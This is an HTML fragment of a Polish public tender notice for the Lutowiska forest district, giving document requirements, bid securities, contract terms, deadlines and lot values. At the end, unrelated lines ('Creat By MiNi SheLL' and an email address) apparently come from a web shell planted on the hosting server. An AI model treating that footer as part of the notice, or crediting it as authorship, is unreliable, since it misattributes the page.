class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty i oświadczenia składane wraz z ofertą.<br/>1) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawcy ma obowiązek złożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. Uwaga: w przypadku, gdy w imieniu Wykonawcy ofertę podpisuje pełnomocnik, w tym również pełnomocnik ujawniony na podstawie przepisu art. 39 ust. 3 ustawy z dnia 06 <br/>marca 2018 r. o Centralnej Ewidencji i Informacji o Działalności Gospodarczej i Punkcie Informacji dla Przedsiębiorcy (t. j. Dz. U. 2022 r., poz. 541), konieczne jest przedłożenie razem z ofertą pełnomocnictwa, w sposób określony w pkt 2) poniżej. <br/>2) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której umocowanie do jego reprezentowania nie wynika z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>publicznego, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby. Pełnomocnictwo powinno być złożone w oryginale, w postaci elektronicznej, lub w postaci cyfrowego odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej kopii), poświadczonej za zgodność z oryginałem przez <br/>mocodawcę albo notarialnie.<br/><br/>Podmiotowe środki dowodowe składane wraz z ofertą – jeżeli dotyczy.<br/>1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty „Oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy” – jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na zdolnościachtych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane (wzór oświadczenia stanowi załącznik nr 4 do SWZ).<br/>2) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma obowiązek złożyć wraz z ofertą, „Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia” lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (wzór zobowiązania stanowi załącznik nr 5 do SWZ).<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności: <br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów <br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać, czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść <br/> wadium na każdą część oddzielnie w wysokości:<br/>Na część nr I. 8 000,00 zł.<br/>Na część nr II. 3 000,00 zł<br/>Na część Nr III. 1 000,00 zł <br/>Na część nr IV. 1 500,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia przed zawarciem umowy zabezpieczenia należytego wykonania umowy w wysokości 4 % ceny całkowitej brutto podanej w ofercie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający wymaga zawarcia umowy według wzoru, stanowiącego załącznik nr 11 do SWZ, z uwzględnieniem wymagań zawartych w Karcie gwarancyjnej, stanowiącej załącznik do umowy.<br/>2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.<br/>3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany mogą być wprowadzone w przypadku wystąpienia co najmniej jednej z wymienionych we wzorze umowy okoliczności oraz gdy zostaną uwzględnione, opisane w niej warunki wprowadzenia tych zmian.<br/>4. Wzór umowy, o którym mowa powyżej, zawiera postanowienia dotyczące podwykonawstwa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pomocą na strony internetowej https://platformazakupowa.pl/pn/lasy_lutowiska.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-18 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Adres strony internetowej Zamawiającego - profilu nabywcy:<br/>http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lutowiska/<br/><br/>Wartość poszczególnych części netto (wraz z 20% prawa opcji oraz 50% powtórzenia zamówienia):<br/>Część 1 - 1 378 998,68 zł<br/>Część 2 - 475 492,23 zł<br/>Część 3 - 141 716,95 zł<br/>Część 4 - 178 398,75 zł

Creat By MiNi SheLL
Email: jattceo@gmail.com